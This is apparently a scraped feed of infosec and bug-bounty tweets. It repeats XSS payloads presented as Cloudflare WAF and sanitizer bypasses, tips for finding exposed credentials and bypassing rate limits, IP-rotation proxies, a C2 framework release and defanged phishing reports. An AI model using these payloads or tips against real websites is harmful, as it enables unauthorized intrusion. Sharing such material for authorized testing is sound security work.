Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find "all" paths for Next.js websites:
DevTools->Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS" payload: '<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

viehgroup's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/ 

#infosec #cybersec #bugbountytips

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

⚔️ How can VPN bans bypass your security protocols? Get informed for better defense planning. #infosec #coding #ethicalhacking #hack #hackers #hacking cnet.co/46F6UCa

anonymous_phill's tweet image. ⚔️ How can VPN bans bypass your security protocols? Get informed for better defense planning. #infosec #coding #ethicalhacking #hack #hackers #hacking cnet.co/46F6UCa

According to Hudson Rock (@rockhudsonrock), from over 33,183,790 compromised computers, pepsico.com has at least 562 compromised employees & 661 compromised users. Search your domain for FREE here: hudsonrock.com/search?domain=… #CyberAttack #infosec

hudsonrockbot's tweet image. According to Hudson Rock (@rockhudsonrock), from over 33,183,790 compromised computers, pepsico.com has at least 562 compromised employees &amp;amp; 661 compromised users.

Search your domain for FREE here: hudsonrock.com/search?domain=…

#CyberAttack #infosec

Fedora 42: podman tui 2025 a8f5576fe3 podman tui release v1.9.0 podman tui release 1.8.1 Fedora Update Notification FEDORA 2025 a8f5576fe3 2025 10 13 00:40:04.312566 00:00... #Fedora #Linux #infosec #opensource #linuxsecurity tinyurl.com/27a665un

LS_Advisories's tweet image. Fedora 42: podman tui 2025 a8f5576fe3 podman tui release v1.9.0 podman tui release 1.8.1 Fedora Update Notification FEDORA 2025 a8f5576fe3 2025 10 13 00:40:04.312566 00:00... #Fedora #Linux #infosec #opensource #linuxsecurity tinyurl.com/27a665un

IBM Security Verify Access: CVE-2025-36087 Alert Hard-coded credentials in IBM Security Verify Access expose systems to potential unauthorized access. Immediate patching is recommended. For more details, read ZeroPath's blog on this vuln. #AppSec #InfoSec #CyberSecurity


🚨 #phishing report issued 🚨 🌐 Suspected URL: https://www[.]web3authuser3[.]net/ 🔎 Analysis: urlscan.io/result/0199db3… 🔒 #InfoSec 🛡️ @CloudflareHelp @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: https://www[.]web3authuser3[.]net/
🔎 Analysis: urlscan.io/result/0199db3…

🔒 #InfoSec
🛡️ @CloudflareHelp @Phish_Destroy

🚨 BREAKING: For the first time in cybersecurity history, a researcher called CYBER KALKI has hacked acunetix flagship test site testphp.vulnweb.com and turned into a PUBLIC honeypot now exposed live for public to view #fr #hacking #infosec #ethicalhacking #bugbounty


🚨 #phishing report issued 🚨 🌐 Suspected URL: https://etherealgov[.]com/ 🔎 Analysis: urlscan.io/result/0199db3… 🔒 #InfoSec 🛡️ @CloudflareHelp @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: https://etherealgov[.]com/
🔎 Analysis: urlscan.io/result/0199db3…

🔒 #InfoSec
🛡️ @CloudflareHelp @Phish_Destroy

🚨 #phishing report issued 🚨 🌐 Suspected URL: https://connectionresolve[.]github[.]io/en/ 🔎 Analysis: urlscan.io/result/0199db3… 🔒 #InfoSec 🛡️ @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: https://connectionresolve[.]github[.]io/en/
🔎 Analysis: urlscan.io/result/0199db3…

🔒 #InfoSec
🛡️ @Phish_Destroy

🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners PDF: 0xinfection.github.io/reversing/reve… author: @0xInfection #infosec #reverseengineering

mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering
mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

[Blog] my journey as a @Microsoft Security Researcher! 🚀 Tips, learnings & insights for anyone aspiring to land their dream role in cybersecurity. 🔗 shreyapohekar.com/blogs/landing-… #Microsoft #Infosec #FreshersInTech #SecurityResearch #security

shreyapohekar's tweet image. [Blog] my journey as a @Microsoft  Security Researcher! 🚀
Tips, learnings &amp;amp; insights for anyone aspiring to land their dream role in cybersecurity.
🔗 shreyapohekar.com/blogs/landing-…

#Microsoft #Infosec #FreshersInTech #SecurityResearch #security

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

Wyrm C2 v0.3 is officially released - bringing a web based GUI to the post exploitation framework! You can easily run the new GUI with docker, from the /client directory: docker compose up -d! Ezpz! github.com/0xflux/Wyrm #redteam #cyber #infosec #cybersecurity #computing

0xfluxsec's tweet image. Wyrm C2 v0.3 is officially released - bringing a web based GUI to the post exploitation framework! You can easily run the new GUI with docker, from the /client directory: docker compose up -d! Ezpz!

github.com/0xflux/Wyrm

#redteam #cyber #infosec #cybersecurity #computing…

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

Loading...

Something went wrong.


Something went wrong.


United States Trends